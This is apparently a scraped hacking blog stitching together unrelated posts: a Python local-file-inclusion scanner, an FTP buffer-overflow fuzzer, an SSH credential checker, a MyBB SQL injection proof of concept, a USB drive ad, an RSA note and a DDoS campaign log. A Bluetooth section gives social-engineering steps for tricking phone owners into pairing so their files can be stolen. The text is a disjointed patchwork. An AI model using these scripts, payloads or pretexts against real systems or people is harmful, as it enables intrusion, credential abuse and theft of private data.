# Print the parameters and store them in single variables
print "[i] The following", parameters_count, "parameter(s) was/were found:"
print "[i]", parameters

# Have a look at each parameter and do some nasty stuff
for index, item in enumerate(parameters):
print "[i] Probing parameter \"", item, "\"..."

check_value_of_tested_parameter = local_file_for_first_test
check_value_of_tested_parameter_with_nullbyte = local_file_for_first_test + nullbyte
query_string = get_parsed_url.query

# Find out what value the checked parameter currently has
for key, value in parameters.items():
if key == item:
# Save the value of the vulnerable parameter, so we later can search in in the URL
original_value_of_tested_parameter = value

# Our main routine, maybe the most important part of this script
# At first without the nullbyte
for depth in range(i, max_depth):
# Replace the default value of the vulnerable parameter with our LFI string
replace_string = (depth * one_step_deeper) + local_file
replace_string_2 = item + param_equals + (depth * one_step_deeper) + local_file

# The first test is a special case. With the code above, we would check for the file "etc/passwd" which does not
# work. Therefore we replace "etc/passwd" with "/etc/passwd" for our first vulnerability check.
if depth== 0:
replace_string = local_file_for_first_test
replace_string_2 = item + param_equals + local_file_for_first_test

replace_me = item + param_equals + original_value_of_tested_parameter
modified_query_string = query_string.replace(replace_me, replace_string_2)

# Now craft the URL
lfi_url_part_one = "".join(get_parsed_url[0:1]) + "://"
lfi_url_part_two = "".join(get_parsed_url[1:2])
lfi_url_part_three = "".join(get_parsed_url[2:3]) + "?"
lfi_url_part_four = "".join(modified_query_string)
lfi_url = lfi_url_part_one + lfi_url_part_two + lfi_url_part_three + lfi_url_part_four

# Ok, everything is prepared to enter subspace.. eeh, to call the URL (Stargate fans get this joke!)
request_website = urllib2.Request(lfi_url)
request_website.add_header('User-Agent', user_agent)

try:
lfi_response = urllib2.urlopen(request_website)
except URLError, e:
print "[!] The connection could not be established."
print "[!] Reason: ", e
else:
lfi_response_source_code = lfi_response.read()
if find_nasty_string in lfi_response_source_code:
print "[+] Found signs of a LFI vulnerability! No nullbyte was required."
print "[+] URL: " + lfi_url
lfi_exploit_url = lfi_url
nullbyte_required = 0
lfi_found = 1
exploit_depth = depth
break
else:
if find_nasty_string_2 in lfi_response_source_code:
print "[+] Found signs of a LFI vulnerability! No nullbyte was required."
print "[+] URL: " + lfi_url
lfi_exploit_url = lfi_url
nullbyte_required = 0
lfi_found = 1
exploit_depth = depth
break

if nullbyte_required == 1:
# Now with the nullbyte
for depth in range(i, max_depth):
# Replace the default value of the vulnerable parameter with our LFI string
replace_string = (depth * one_step_deeper) + local_file + nullbyte
replace_string_2 = item + param_equals + (depth * one_step_deeper) + local_file + nullbyte

# The first test is a special case. With the code above, we would check for the file "etc/passwd" which does not
# work. Therefore we replace "etc/passwd" with "/etc/passwd" for our first vulnerability check.
if depth== 0:
replace_string = check_value_of_tested_parameter_with_nullbyte
replace_string_2 = item + param_equals + check_value_of_tested_parameter_with_nullbyte

replace_me = item + param_equals + original_value_of_tested_parameter
modified_query_string = query_string.replace(replace_me, replace_string_2)

# Now craft the URL
lfi_url_part_one = "".join(get_parsed_url[0:1]) + "://"
lfi_url_part_two = "".join(get_parsed_url[1:2])
lfi_url_part_three = "".join(get_parsed_url[2:3]) + "?"
lfi_url_part_four = "".join(modified_query_string)
lfi_url = lfi_url_part_one + lfi_url_part_two + lfi_url_part_three + lfi_url_part_four

# Ok, everything is prepared to enter subspace.. eeh, to call the URL (Stargate fans get this joke!)
request_website = urllib2.Request(lfi_url)
request_website.add_header('User-Agent', user_agent)

try:
lfi_response = urllib2.urlopen(request_website)
except URLError, e:
print "[!] The connection could not be established."
print "[!] Reason: ", e
else:
lfi_response_source_code = lfi_response.read()
if find_nasty_string in lfi_response_source_code:
print "[+] Found signs of a LFI vulnerability! Using the nullbyte was necessary."
print "[+] URL: " + lfi_url
lfi_exploit_url = lfi_url
lfi_found = 1
exploit_depth = depth
break
else:
if find_nasty_string_2 in lfi_response_source_code:
print "[+] Found signs of a LFI vulnerability! Using the nullbyte was necessary."
print "[+] URL: " + lfi_url
lfi_exploit_url = lfi_url
lfi_found = 1
exploit_depth = depth
break

if lfi_found == 0:
print "[!] Sorry, I was not able to detect a LFI vulnerability here."
print "[!] Exiting now!"
print ""
print ""
sys.exit()

# Create a simple log file
log_file_name = get_parsed_url.netloc + "_-_" + strftime("%d_%b_%Y_%H:%M:%S_+0000", gmtime()) + "_-_scan.log"
FILE = open(log_file_name, "w")
FILE.write("Simple Local File Inclusion Vulnerability Scanner - Log File\n")
FILE.write("----------------------------------------------------------------------\n\n")
FILE.write("Scanned URL:\n")
FILE.write(scan_url + "\n\n")
FILE.write("LFI URL:\n")
FILE.write(lfi_exploit_url)
FILE.close

print ""
print "[i] A small log file was created."
print "[i] Completed the scan. Will now exit!"
print ""
print""
sys.exit(1)

return


def main(argv):
scan_url=""

try:
opts, args = getopt.getopt(sys.argv[1:], "", ["help", "url="])
except getopt.GetoptError :
print_usage()
sys.exit(2)

for opt, arg in opts:
if opt in ("--help"):
print_help()
break
sys.exit(1)
elif opt in ("--url") :
scan_url=arg

if len(scan_url) < 1:
print_usage()
sys.exit()

# Continue if all required arguments were passed to the script.
print_banner()
print "[i] Provided URL to scan: " + scan_url

# Check if URL is reachable
test_url(scan_url)

# Calling the LFI scanner function
scan_lfi(scan_url)

if __name__ == "__main__":
main(sys.argv[1:])

### EOF ###

All about blue <= this is for you my friends Chlsl Akbr

Bluejacking, Bluesnarfing, and Bluebugging


Bluejacking.
Bluejacking is the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs or laptop computers, sending a vCard which typically contains a message in the name field (i.e. for bluedating or bluechat) to another bluetooth enabled device via the OBEX protocol.

Bluetooth has a very limited range, usually around 10 meters on mobile phones, but laptops can reach up to 100 meters with powerful (Class 1) transmitters.

That's the wikipedia definition.

How to

So, how do you do this?

Browse to the file you want to send.

Open up the options menu, and choose send via bluetooth.

It should scan for a device.

When a few come up, choose your target, and send it.

Cool, but worthless.


Bluesnarfing.
Bluesnarfing is the unauthorized access of information from a wireless device through a Bluetooth connection, often between phones, desktops, laptops, and PDAs. This allows access to a calendar, contact list, emails and text messages, and on some phones users can steal pictures and private videos. Currently available programs must allow connection and to be 'paired' to another phone to steal content. There may be other programs that can break into the phones without any control, but if they exist they are not made publicly available by the developer. One instance of Bluesnarfing software that was demonstrated (but never made available for download) utilised weaknesses in the Bluetooth connection of some phones. This weakness has since been patched by the Bluetooth standard. There seems to be no available reports of phones being Bluesnarfed without pairing, since the patching of the Bluetooth standard.

Once again, that's the wikipedia article.

How does this work?

You may have noticed, you need to pair the device in bluetooth.

That's where social engineering comes into play.

Change the bluetooth name of your phone or laptop to some thing like "Cellular update service" or "Cellular update team".

I personally use the first one.

Next, bluejack a message along the lines of "We have learned that you need an update to keep your phone working on our new network. In a few seconds, you will be asked to pair with a blue tooth device. when asked to, type in the passcode "Your numerical passcode here, I use 0000".

Next, pair up with them.

Snarf some files.

For a program to aid in case this is hard to do on your phone, check out Bloover.


Bluebugging.
Bluebugging is a form of bluetooth attack. In progession of discovery date, bluetooth attack started with bluejacking, then bluesnarfing, and then bluebugging.
Bluebugging was discovered by German researcher Herfurt. His Bluebug program allow the user to take control of a victim's phone to call the user's phone. This means that the Bluebug user can simply listen to any conversation his victim is having in real life.
Initially, Bluebugging was carried out using laptops. With the advent of powerful PDAs and mobile devices, Bluebugging can now be carried out using these devices.
Further developments of Bluebugging tools has allowed Bluebugging to "take control" of the victim's phone. Not only can they make calls, they can send messages, essentially do anything the phone can do.

Wikipedia.

How to?

Follow the same social engineering as bluesnarfing, then stop.

To bluebug without a computer (or a means of getting down to the lowest level of your phone, which is extremely difficult, and requires a lot of programming) you need a program, like BT info.

Run the program.

NOTE:That is not being a script kiddie, no matter what anyone says.

Scanner FTP Vulnerability

#!/usr/bin/python

import socket


def bo(bo_com, bo_size, bo_type):
ncom = len(bo_com)
nsize = len(bo_size)
ntype = len(bo_type)
for ia in range(0,ncom):
var = str(bo_com[ia]) + " "
for ib in range(0,ntype):
var1 = str(bo_type[ib]) + " "
for ic in range(0,nsize):
var2 = (bo_size[ic])
buffer = var + var1
s.send(buffer * var2 +"\r\n")
msgbo = s.recv(3)
if msgbo != "500":
print("Buffer Oveflow")
print ("Command " + var)
print s.recv(1024)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
s.recv(1024)
s.send("user ftp\r\n")
s.recv(1024)
s.send("pass ftp\r\n")
s.recv(1024)

bo_com = ["QUOTE","MGET","MPUT","ABOR","ACCT","ALLO","APPE","AUTH","CWD","CDUP","DELE","FEAT","HELP","HOST","LANG","LIST","MDTM","MKD","MLST","MODE","NLST","NLST -al","NOOP","OPTS","PASV","PORT","PROT","PWD","REIN","REST","RETR","RMD","RNFR","RNTO","SIZE","SITE","SITE CHMOD","SITE CHAWN","SITE EXEC","SITE INDEX","SITE MSG","SITE PSWD","SITE ZONE","SITE WHO","SMNT","STAT","STOR","STOU","STRU","SYST","TYPE","XCUP","XCRC","XCWD","XMKD","XPWD","XRMD"]
bo_size = [100,500,1000,5000,10000,50000]
bo_type = ["A","\n","/n","!A","../",".././","@",""]
bo(bo_com, bo_size, bo_type)
print s.recv(1024)

SSH checker

This simple script for check ssh login
Writing on python with use module py-paramiko

for using need install module paramiko
in Freebsd install from ports:
cd /usr/ports/security/py-paramiko && make install clean
or install from source
import paramiko
import sys, os
import socket
import re

# - - - - - - - - - - - - - - - - #
# SSH Checker #
# - - - - - - - - - - - - - - - - #

#log_file = "log.txt"
read_access = "access.txt"
sucess = 0

ssh = paramiko.SSHClient()


# Test on connect to server
def is_work_sshd(host, dPort=22):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.settimeout(20)
try:
sock.connect((host, dPort))
except:
# print "Connect to ssh server timeout"
return 1

# print "Connect Ok"
sock.close()
return 0

''' Test host on avalible
def pinger(host):
result_ping = os.popen("ping -c 3 %s" % host)
if result_ping.read().search("bytes"):
print "find bytes"
return 1
return 0
'''

def check_server(host, user, password, port=22):
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# test on connect to ssh
if is_work_sshd(host,port): return 2

try:
ssh.connect(host, username=user, password=password, port=port)
# print "Ok" # Connect sucess ;)

ssh.close() # Close ssh session
except:
#print 'Error'
return 1
return 0

if not os.path.exists(os.getcwd() + '/' + read_access):
print "File not found!"
sys.exit()

fd = open(read_access, "r")
for i in fd.readlines():
if i[-1:] == '\n':
i = i[:-1]

port = 22
#print i #Debug blia
res = i.split(':')
if(len(res) > 2):
user,host,password = res[:3]
if(len(res) > 3):
port = int(res[3])

#print user, host, password, port
ret = check_server(host, user, password, port)
if not ret:
print "Connect to %s [success]" % host
elif ret == 1:
print "Connect to %s [error]" % host
else:
print "Connect to %s [timeout]" % host

Selasa, 28 Desember 2010

VirusTotal Python Submission Script

Here is a simple python script for batch malware submissions to VirusTotal via its email interface.  Simply replace the SMTP-related variables at the top of the script and you’re ready to rock!

Download : vtsubmit.py


#!/usr/bin/env python

# vtsubmit.py
# VirusTotal Submission Script

import os, sys, email, smtplib, hashlib

SMTP_HOST = '_HOST_'
SMTP_PORT = 587
SMTP_USER = '_USER_'
SMTP_PASS = '_PASS_'

TO_ADDR = '[email protected]'
FROM_ADDR = '_EMAIL_'

def main():
if len(sys.argv) == 1:
print 'please specify files to submit'
sys.exit(1)

filelist = sys.argv[1:]
total = len(filelist)
progress = 0

for filename in filelist:
progress += 1
data = open(filename, 'rb').read()
sha1 = hashlib.sha1(data).hexdigest()
base = os.path.basename(filename)

print '%d of %d: %s (%s)' % (progress, total, base, sha1)

Kingston Digital 16 GB USB 2.0 Hi-speed Datatraveler Flash Drive DT101G2/16GBZ, Black

The kingston datatraveler 101 generation 2 (g2) is here! this convenient storage companion lets you take all of your data to your home, office, school and anywhere you travel. now with urdrive, it gives you a better way to look at your data while combining cool features1 to make it your own.easily store, organize and share your favorite photos through the built-in photo viewer, search the convenient built-in internet browser and view the cool appzone for new apps2 to try — all in a flash. 

In the months ahead, urdrive will update to offer even more apps and offers. sleek, practical and attractively designed, the affordable datatraveler 101 g2 serves the needs of the budget-conscious user as well as those looking for significant storage capacity in a lightweight, compact drive. it features a capless, swivel design for added functionality and ease of use and is available in fun colors by capacity. 

Ideal for anyone on the go, the new dt 101g2 with urdrive is like having a customizable, portable desktop — anywhere. datatraveler 101 g2 is backed by legendary kingston reliability plus a five-year warranty and free tech support.

Product Details
  1. Color: Black
  2. Brand: Kingston
  3. Model: DT101G2/16GBZ
  4. Dimensions: .50" h x 4.00" w x 4.50" l, .25 pounds
Features
  1. Supports Windows 7, Vista, XP & Mac
  2. urDrive Software-customizable, portable desktop-anywhere.
  3. Sleek capless design no cap to lose
  4. Available in multiple colors by capacity
  5. Capacities up to 32GB
  6. Dimensions -2.25 x 0.68 x 0.39 Inches (57.18mm x 17.28mm x 10.00mm)
  7. Speed ? 16GB: 10MB/sec. read and 5MB/sec. write3
  8. Storage Temperature -4° - 185°F / -20° to 85°C 
 

Sabtu, 25 Desember 2010

MyBB 1.6 <= SQL Injection Vulnerability

=================================
MyBB 1.6 <= SQL Injection Vulnerability
================================= 

1. OVERVIEW

Potential SQL Injection vulnerability was detected in MyBB.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

The "keywords" parameter was not properly sanitized in /private.php
and /search.php which leads to SQL Injection vulnerability.
Full exploitation  possibility is probably mitigated by clean_keywords
and clean_keywords_ft functions in inc/functions_search.php.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

=> /search.php

POST /mybb/search.php

action=do_search&forums=2&keywords='+or+'a'+'a&postth
read=1


=> /private.php

POST /mybb/private.php

my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs
&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT
http://d4wfl1n.nyubicrew.us/2010/12/mybb-16-sql-injection-vulnerability.html
This vulnerability was discovered by D4wFl1N


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-25: vulnerability disclosed


10. REFERENCES

Original Advisory URL:

About MyBB: http://www.mybb.com/about/mybb

 
#D4wFL1N [25-12-2010]

RSA in JavaScript

The example below uses my 100% JavaScript multiple-precision math library. The encryption exponent is small-ish, making for faster encryption. Presumably, decryption would be handled on the server, where things aren't as slow.
In a nutshell, here are the JavaScript files you need :

Additionally, I wrote a Windows application that generates random keys for use with the JavaScript library. It even generates the JavaScript source code. Paste and go!

Note: The RSA key generator application is written in Delphi 4, which is Object Pascal. This includes a re-implementation of the multiple-precision library and the Miller-Rabin test for primality. Keys are generated using Algorithm 8.1 from the Handbook of Applied Cryptography. However, the actual random-number generation is not particularly robust. I just use the built-in functions in Delphi, seeded from the system clock. If you want to get fancy, you should write a better random-number generator.

Kamis, 09 Desember 2010

This the Season of DDoS – WikiLeaks Edition




Scroll to the bottom for the latest updates…

DDoS attacks are flying across the Internet like there is no tomorrow.  Just a few days ago, a hacktivist operating under the handle “th3j35t3r” decided to single-handedly take down the Wikileaks website with a DoS tool of his (or their) own creation.  He issued a statement on Twitter shortly after explaining that the attacks against the WikiLeaks website were made for “attempting to endanger the lives of our troops, ‘other assets’ & foreign relations.”   According to our statistics, his attacks resulted in 1 day 3 hours and 50 minutes of downtime for WikiLeaks before the site was completely yanked offline by Amazon and EveryDNS.



On the other side of the attack spectrum, the anonymous attackers involved in Operation:Payback have vowed to take a temporary break from their mega-assault on the entertainment industry in order to spend some time helping WikiLeaks.  Their first attack has been set on PayPal, after the U.S. based company closed its doors on WikiLeaks citing an AUP violoation.
PayPal issued the following statement on their blog:

“PayPal has permanently restricted the account used by WikiLeaks due to a violation of the PayPal Acceptable Use Policy, which states that our payment service cannot be used for any activities that encourage, promote, facilitate or instruct others to engage in illegal activity”
Shortly after the PayPal announcement, Anonymous decided that the PayPal Blog would be its first DDoS target in Wikileaks related counterattacks.
The following statements were released on an Anonymous Twitter account:


“TANGO DOWN — thepaypalblog.com — Blog of Paypal, company that has restricted Wikileaks’ access to funding. #Paypal #Wikileaks #WL #DDoS”
“Close your #Paypal accounts in light of the blatant misuse of power to partially disable #Wikileaks funding. Join in the #DDoS if you’d like”

According to our stats, ThePayPalBlog.com has been down as of 4AM PST on 12/4/2010 and shows no sign of coming back online anytime soon.
Anonymous organizers had this to say in regards to the temporary switch in focus,

While we don’t have much of an affiliation with WikiLeaks, we fight for the same: we want transparency (in our case in copyright) and we counter censorship. The attempts to silence WikiLeaks are long strides closer to a world where we can not say what we think and not  express how we feel. We can not let this happen, that is why we will find out who is attacking WikiLeaks and with that find out who tries to  control our world. What we are going to do when we found them? Except for the usual DDoSing, word will be spread that whoever tries to silence or discourage WikiLeaks, favors world domination rather than freedom and democracy.”
Anti-Anti WikiLeaks


 Update – 12/4/2010 – 10:50 AM PST:
  After nearly 7 hours of constant attacks, the PayPal blog has either been deleted or permanently taken offline.  Accessing the blog this morning revealed the following 403/access forbidden error:
  403 error on ThePayPalBlog.com


Update – 12/4/2010 – 1:24 PM PST:
ThePayPalBlog.com is no longer resolving to the 403 error page and is completely down again.

Update – 12/4/2010 – 2:50 PM PST:
PayPal has reduced its entire blog to a plain text statement regarding their decision to suspend WikiLeaks.
PayPal Blog Notice


Update – 12/5/2010 – 1:28 PM PST:
ThePayPalBlog.com is now back up after 75 service interruptions and 8 hours 15 minutes of total downtime.  This report doesn’t take into account the many hours that ThePayPalBlog.com resolved to a 403 error.
 ThePayPalBlog.com



Update – 12/6/2010 – 3:06 AM PST
Official plans to support WikiLeaks have been announced.

Update – 12/6/2010 – 12:00 PM PST
Anonymous has launched its second attack on the main PayPal website.  Minutes after they announced the launch of the attack, their infrastructure started to take a hit.  Their website is now unavailable and presumably under counter DDoS attack. The following poster has been circulating on the Internet:

 
Anonymous :: Paypal Attack Poster


Update – 12/6/2010 – 12:30 PM
They are now going after postfinance.ch, the bank that took down Julian Assange’s defense
fund.  We have recorded 5 minutes of downtime so far.

Update – 12/6/2010 – 1:52 PM
The attack on postfinance.ch is ongoing.  The site first went down at 12:33 PM PST and has been down for over one hour.

 postfinance.ch downtime


Update – 12/6/2010 – 3:02 PM
The Anonymous website is currently under heavy DDoS attack.  We’ve observed just under 2 hours of downtime and 23 service interruptions since the pro-wikileaks attacks started this morning.

Anonymous Counterattack


Update – 12/6/2010 – 5:07 PM
The attack against PostFinance.ch is still underway.  We have observed 4 hours 41 minutes of continuous downtime since the attack started. In addition to the DDoS attack, some Anonymous members are spamming PostFinance offices with the following image.


Update – 12/7/2010 – 12:03 AM
The attack against PostFinance.ch is still going strong with 11 hours 35 minutes of recorded downtime and counting. This DDoS is one of the first successful attacks on a financial institution and is getting in the way of customers doing business with the company.  One user wrote on Twitter, ” #payback can you stop the DDoS on postfinance for 10 minutes so that I can bank please? pretty please?”
 #payback can you stop the DDoS on postfinance for 10 minutes so that I can bank please? pretty please?

 
Update – 12/7/2010 – 9:30 AM
Anonymous attacked postfinance.ch well into last night, with 16 hours and 30 minutes of recorded downtime.  The chat room currently has over 900 people joining in on the attack, as well as over 500 computers involved in their voluntary DDoS botnet (LOIC HIVEMIND). LOIC (Low Orbit Ion Canon) is a DDoS tool developed by the attackers to carry out their DDoS attacks.  The software allows users to insert a command and control address into the application, which will then automatically connect their computer to the “HIVEMIND” and immediately start attacking a predetermined target.
Here is what the software looks like:



Update – 12/7/2010 – 9:44 AM
The target has switched over to http://aklagare.se, the Swedish prosecutors.  The website was down instantaneously after the target was selected with over 500 computers in the voluntary botnet attacking the site all at once.
Update – 12/7/2010 – 10:16 AM
Over 1000 people have joined the chat to participate in the attacks against anything anti-WikiLeaks.

Over 1000 attackers have joined in on the attacksA

Update – 12/7/2010 – 2:10 PM
We have recorded 4 hours 26 minutes of downtime for Aklagare.se, since the attack started focusing on the site at 9:44AM PST

Update – 12/7/2010 – 3:06 PM
The target has been switched to EveryDNS.com, the DNS provider that took WikiLeaks down. The target was announced at 2:52 PM PST and the website was taken down just one minute later at 2:53 PM PST.  We have 10 minutes of recorded downtime and counting:


Update – 12/7/2010 – 3:51 PM
The target has now been changed to http://lieberman.senate.gov.  This marks the first time Operation Payback has targeted a government site under “Operation Avenge Assange.”

Update – 12/7/2010 – 4:16 PM
We have recorded the first downtime for lieberman.senate.gov.  There are currently just under 1,000 attackers in the chat room and almost 600 computers connected to the voluntary botnet.
http://lieberman.senate.gov went down for 1 minute at 4:11 PM PST:
lieberman.senate.gov downtime



Update – 12/7/2010 – 4:56 PM
Operation:Payback has been under a constant DDoS counter-attack, but the attacks against the site intensified shortly after announcing the attack on Senator Lieberman’s website.  We’re not sure who exactly is involved in the retaliation against the group, but we suspect that it may be a group of patriots attempting to protect the greater interests of the United States of America.

Here is a uptime graph of Operation:Payback’s website:
DDoS against Operation:Payback


Update – 12/7/2010 – 5:54 PM
The attack on lieberman.senante.gov ended with 8 service interruptions and 12 minutes of downtime.  The attack is now back on e-finance.postfinace.ch, which has been hit the hardest with 61 service interruptions and 1 day 2hours 36 minutes of downtime.

 lieberman.senate.gov downtime

Update – 12/7/2010 – 7:20 PM
They have switched targets to www.advbyra.se, the lawyer of the 2 girls who were allegedly raped and/or assaulted by Julian Assange.
The site took only 1 minute to bring down and has been down for the past 15 minutes.
Update – 12/7/2010 – 8:15 PM
A small group of Anonymous protesters (not everyone) have started attacking Sarah Palin’s website (sarahpac.com) in retaliation for stating that Assange should be hunted like a terrorist.  We have observed 6 minutes of downtime so far.
Sarah Palin DDoS
This highlights the fact that no one is “in charge” of this attack campaign.  These attackers make target suggestions and follow along at will… even if just a few of them are on board with it.
Update – 12/8/2010 – 1:56 AM
We have observed 256 service interruptions and 94 hours of combined downtime since these attacks started on December 4th.  We also observed over 8 hours of  counter-ddos downtime on the attackers (anonops.net) site.
Below you will find our latest updated downtime tracker:
Note: Each site name can be clicked on and will take you to the corresponding part of the blog post.
Site Interruptions Downtime (h:m)
ThePayPalBlog.com 77 8:19
PostFinance.ch 55 33:08
e-finance.postfinace.ch 61 33:07
www.aklagare.se 11 13:00
everydns.com 4 0:31
lieberman.senate.gov 8 0:12
ADVBYRA.SE 32 5:11
sarahpac.com 8 0:25



TOTAL 256 94 hours

Update – 12/8/2010 – 2:37 AM
This attack campaign evolves so quickly that they already started targeting MasterCard.com while I wrote my last update for the night.
Mastercard Takedown Announcement
Mastercard Takedown Announcement
MasterCard.com first went down at 1:14 AM PST with 4 service interruptions and is currently experiencing 1 hour+ of ongoing downtime.
MasterCard.com Downtime
MasterCard.com Downtime

Update – 12/8/2010 – 3:17 AM
The Internet hosting provider (space2u.com) of the Lawyer representing the 2 girls who were allegedly raped/assaulted by Julian Assange has voluntarily suspended the ADVBYRA.SE website indefinitely.
Here is a snip of the conversation taken from the chat:


This marks the first time a website has been voluntarily removed by an ISP as a direct result of “Operation Avenge Assange.”

Update – 12/8/2010 – 5:18 AM
Mastercard.com is still down with 940 computers in the voluntary botnet attacking the site all at once. We have 3 hours 57 minutes of recorded downtime so far.

Update – 12/8/2010 – 8:24 AM
Mastercard.com is still selected as the main target and has not came back online since our last report.  7 hours of downtime and counting. The amount of participants in the attackers chat room have soared to over 2200 people and there are currently over 1,700 computers in the voluntary botnet.

Update – 12/8/2010 – 12:26 PM
Mastercard.com still under attack with 11 hours of downtime and counting, but the target will change to Visa.com at 1 PM PST.
This is the first time that the group officially targets Visa.com, but we have already observed 106 service interruptions and over 12 hours of downtime for Visa since we started monitoring yesterday at 9PM:

Visa.com Downtime
Visa.com Downtime
Update 12/8/2010 – 4:14 PM
Twitter has suspended the @anon_operation account.


Update  – 12/8/2010 – 8:11 PM PST
Operation Payback has selected PayPal as a target again.  We have observed PayPal’s very first downtime at 6:43 AM today and the site has been going up and down ever since.
We have observed 33 minutes of total downtime and response times in the 2,600-4,000 ms region.
PayPal Downtime
PayPal Downtime
PayPal Response Time
PayPal Response Time

Update – 12/8/2010 – 9:00 PM

If you have been following our blog post today, then you may know that we were under a constant and steady DDoS attack throughout the day.  In the spirit of this post, I’ll go ahead and announce that the PandaLabs blog sustained 139 service interruptions and over 5 hours of downtime today.  It’s still unclear as to who exactly is to blame for the attack, but it’s obvious that they did not want these attacks documented for the general public.

People have been asking me all day if there is some sort of “patriot response” to Operation Payback and there is no doubt in my mind that an initiative does exist, but no one besides @Th3J35t3r has publicly “attacked back” and he/they still haven’t said anything about these latest attacks.
So, what makes me think that there is some sort of underground patriot response?  Well, let’s take a look at the statistics….
The Operation Payback website has sustained a series of DDoS attacks despite being hosted on a “bulletproof” server specializing in anti-ddos and hosted in Russia.
Anonymous Website Downtime
Anonymous Website Downtime

The Anonymous chats server has periodically become flooded with bots.  Here is some of what they had to say:
Flood bots invade #WikiLeaks
Flood bots invade #WikiLeaks


PandaLabs Blog Downtime:
PandaLabs Blog Downtime
PandaLabs Blog Downtime

I expect more counter-attacks as Operation Payback progresses, but it’s still unclear if these patriots will ever make themselves publicly known.

Update – 12/9/2010 – 1:13 AM
There are currently over 500 computers in the voluntary botnet (LOIC Hivemind).   They are all targeting  paypal.com (note: not www.paypal.com), which has been unresponsive for the past 1 hour 20 minutes and counting.

Check back frequently for updates.
Twitter